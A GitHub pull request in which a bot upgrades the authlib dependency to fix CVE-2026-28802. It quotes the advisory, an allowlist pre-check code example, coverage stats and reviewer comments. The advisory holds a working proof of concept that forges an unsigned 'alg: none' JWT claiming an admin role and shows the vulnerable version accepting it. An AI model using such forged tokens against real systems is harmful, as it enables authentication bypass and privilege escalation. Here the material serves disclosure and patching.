
chore(deps): update dependency authlib to v1.6.7 [security]#954

Merged
rene-oromtz merged 1 commit intomainfrom
renovate/pypi-authlib-vulnerability
Mar 5, 2026

Conversation


@renovate renovate bot commented Mar 4, 2026

This PR contains the following updates:

Package Change
authlib 1.6.6 -> 1.6.7

Warning

Some dependencies could not be looked up. Check the warning logs for more information.

GitHub Vulnerability Alerts

CVE-2026-28802

Summary

After upgrading the library from 1.5.2 to 1.6.0 (and the latest 1.6.5), it was noticed that previous tests involving passing a malicious JWT containing alg: none and an empty signature were passing the signature verification step without any changes to the application code, where a failure was expected.

Details

It was likely introduced in this commit:
authlib/authlib@a61c2ac

PoC

from authlib.jose import jwt, JsonWebKey
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend
import json
import base64

def create_jwks():
    private_key = rsa.generate_private_key(
        public_exponent=65537, key_size=2048, backend=default_backend()
    )
    public_pem = private_key.public_key().public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo,
    )
    jwk = JsonWebKey.import_key(public_pem).as_dict()
    jwk["kid"] = "test-key-001"
    jwk["use"] = "sig"
    jwk["alg"] = "RS256"
    jwks = {"keys": [jwk]}
    return jwks

def create_forged_token_with_alg_none():
    # Unsigned token: the header claims alg "none" and the signature segment is empty.
    forged_header = {"alg": "none"}
    forged_payload = {
        "sub": "user123",
        "role": "admin",
        "iat": 1735603200,
    }

    # Compact serialisation uses unpadded base64url for each segment.
    header_b64 = base64.urlsafe_b64encode(
        json.dumps(forged_header).encode("utf-8")
    ).rstrip(b"=")

    payload_b64 = base64.urlsafe_b64encode(
        json.dumps(forged_payload).encode("utf-8")
    ).rstrip(b"=")

    # header.payload. with nothing after the final dot, i.e. an empty signature
    forged_token = header_b64 + b"." + payload_b64 + b"."
    return forged_token

jwks = create_jwks()
forged_token = create_forged_token_with_alg_none()
try:
    claims = jwt.decode(forged_token, jwks)
    print(f"VULNERABLE: Forged token (alg:none) accepted: role={claims['role']}")
except Exception as e:
    print(f"SECURE: Token rejected - {type(e).__name__}")

Output:

pip install -q authlib==1.5.2
python3 authlib_alg_none_vulnerability.py 
SECURE: Token rejected - BadSignatureError
pip install -q authlib==1.6.5
python3 authlib_alg_none_vulnerability.py 
VULNERABLE: Forged token (alg:none) accepted: role=admin

Impact

Users of the library are likely not aware that they now need to check the provided headers and disallow alg: none usage; it is not obvious from the release notes that any action needs to be taken. As a best practice, the library should adopt a 'secure by default' stance, reject alg: none by default, and allow the application to provide an algorithm whitelist.

Applications using this library for authentication or authorization may accept malicious, forged JWTs, leading to:

  • Authentication bypass
  • Privilege escalation
  • Unauthorized access
  • Modification of application data

Release Notes

authlib/authlib (authlib)

v1.6.7

Compare Source

Full Changelog: authlib/authlib@v1.6.6...v1.6.7

Set supported algorithms for the default jwt instance.


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


This PR was generated by Mend Renovate. View the repository job log.
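The advisory above asks applications to check the JOSE header and disallow alg: none themselves, which is what the 1.6.7 release note ("set supported algorithms for the default jwt instance") now does inside the library. The following stdlib-only pre-check is an added example, not code from this PR or from the authlib project: it enforces an explicit algorithm allowlist on the compact-serialised token before the token is handed to jwt.decode(). The allowlist, the function names and the constructed tokens are assumptions.

```python
import base64
import json

# Algorithms the application will verify; everything else, "none" included,
# is rejected before the token reaches the JWT library. (Assumed allowlist.)
ALLOWED_ALGS = frozenset({"RS256"})

class UnsafeTokenHeader(Exception):
    """Raised when a token's JOSE header fails the allowlist check."""

def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def _b64url_decode(segment: str) -> bytes:
    # Compact serialisation drops padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def make_token(header: dict, payload: dict, signature: bytes = b"") -> str:
    """Build a compact JWT for the demo (constructed input; the signature is
    whatever bytes the caller passes, not a real signature)."""
    enc = lambda obj: _b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    return ".".join([enc(header), enc(payload), _b64url_encode(signature)])

def check_token_alg(token, allowed=ALLOWED_ALGS) -> str:
    """Return the header alg if allowlisted, else raise. Run before jwt.decode();
    the comparison is exact, so "none", "None" and "NONE" all fail."""
    if isinstance(token, bytes):
        token = token.decode("ascii")
    parts = token.split(".")
    if len(parts) != 3:
        raise UnsafeTokenHeader("expected header.payload.signature")
    try:
        header = json.loads(_b64url_decode(parts[0]))
    except ValueError as exc:  # binascii.Error and JSONDecodeError are ValueErrors
        raise UnsafeTokenHeader(f"undecodable header: {exc}") from exc
    if not isinstance(header, dict):
        raise UnsafeTokenHeader("header must be a JSON object")
    alg = header.get("alg")
    if not isinstance(alg, str) or alg not in allowed:
        raise UnsafeTokenHeader(f"alg {alg!r} not in allowlist {sorted(allowed)}")
    if not parts[2]:
        raise UnsafeTokenHeader("empty signature segment")
    return alg

def classify(token, allowed=ALLOWED_ALGS) -> str:
    # 'accept:<alg>' or 'reject:<reason>', convenient for logging the decision.
    try:
        return "accept:" + check_token_alg(token, allowed)
    except UnsafeTokenHeader as exc:
        return "reject:" + str(exc)
```

The check only gates which algorithms reach the library; the library's own signature verification against the JWKS still has to run afterwards.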

codecov bot commented Mar 4, 2026

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 73.97%. Comparing base (5f7e59e) to head (53956ea).
⚠️ Report is 1 commit behind head on main.

Additional details and impacted files
@@           Coverage Diff           @@
##             main     #954   +/-   ##
=======================================
  Coverage   73.97%   73.97%           
=======================================
  Files         108      108           
  Lines       10341    10341           
  Branches      887      887           
=======================================
  Hits         7650     7650           
  Misses       2503     2503           
  Partials      188      188           
Flag     Coverage Δ      *Carryforward flag
agent    74.64% <ø> (ø)  Carriedforward from 5f7e59e
cli      89.56% <ø> (ø)  Carriedforward from 5f7e59e
device   60.13% <ø> (ø)  Carriedforward from 5f7e59e
server   87.88% <ø> (ø)

*This pull request uses carry forward flags. Click here to find out more.

Components         Coverage Δ
Agent              74.64% <ø> (ø)
CLI                89.56% <ø> (ø)
Common             ∅ <ø> (∅)
Device Connectors  60.13% <ø> (ø)
Server             87.88% <ø> (ø)

@bladernr bladernr requested a review from rene-oromtz March 5, 2026 13:59

bladernr commented Mar 5, 2026

Couldn't resist clicking the dependabot button to see what it does to resolve this.

@ajzobro ajzobro (Contributor) left a comment

LGTM!

I was concerned at first read that it might try to suggest working values for an algorithm and, e.g. security salt value -- I would think we don't want any WORKING code with respect to auth keys because there ought to be a non-zero amount of effort to bring that online.

Seems like I was wrong :-)

@renovate renovate bot force-pushed the renovate/pypi-authlib-vulnerability branch from 8410c98 to 42c416e Compare March 5, 2026 17:43
@renovate renovate bot force-pushed the renovate/pypi-authlib-vulnerability branch from 42c416e to 53956ea Compare March 5, 2026 18:40
@rene-oromtz rene-oromtz merged commit f4338e1 into main Mar 5, 2026
15 checks passed
@rene-oromtz rene-oromtz deleted the renovate/pypi-authlib-vulnerability branch March 5, 2026 19:07